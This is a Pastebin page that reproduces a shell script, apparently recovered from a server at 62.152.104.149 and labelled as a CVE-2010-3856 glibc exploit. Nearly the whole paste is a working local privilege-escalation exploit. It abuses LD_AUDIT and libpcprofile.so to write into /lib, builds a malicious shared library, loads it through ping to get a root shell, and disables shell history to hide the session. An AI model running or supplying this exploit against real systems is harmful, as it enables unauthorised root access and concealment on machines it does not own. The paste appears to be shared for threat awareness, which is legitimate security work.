daily pastebin goal
14%
SHARE
TWEET

62.152.104.149 glibc.sh CVE-2010-3856

eromang Aug 29th, 2012 311 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. -----------------------------------------------------------
  2. glibc.sh file on 62.152.104.149 aka CVE-2010-3856
  3. http://packetstormsecurity.org/files/106817/glibc-LD_AUDIT-Privilege-Escalation.html
  4. -----------------------------------------------------------
  5.  
  6. #!/bin/sh
  7.  
  8. echo "[+] Setting umask to 0 so we have world writable files."
  9. umask 0
  10.  
  11. echo "[+] Preparing binary payload."
  12. cat > /tmp/payload.c <<_EOF
  13. void __attribute__((constructor)) init()
  14. {
  15.         printf("[+] Cleaning up.\n");
  16.         unlink("/lib/libexploit.so");
  17.  
  18.         printf("[+] Launching shell.\n");
  19.         setuid(0);
  20.         setgid(0);
  21.         setenv("HISTFILE", "/dev/null", 1);
  22.         execl("/bin/sh", "/bin/sh", "-i", 0);
  23. }
  24. _EOF
  25. gcc -w -fPIC -shared -o /tmp/exploit /tmp/payload.c
  26.  
  27. echo "[+] Writing root owned world readable file in /lib"
  28. LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/lib/libexploit.so" ping 2>/dev/null
  29.  
  30. echo "[+] Filling the lib file with lib contents."
  31. cat /tmp/exploit > /lib/libexploit.so
  32. rm /tmp/payload.c /tmp/exploit
  33.  
  34. echo "[+] Executing payload."
  35. LD_AUDIT="libexploit.so" ping
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top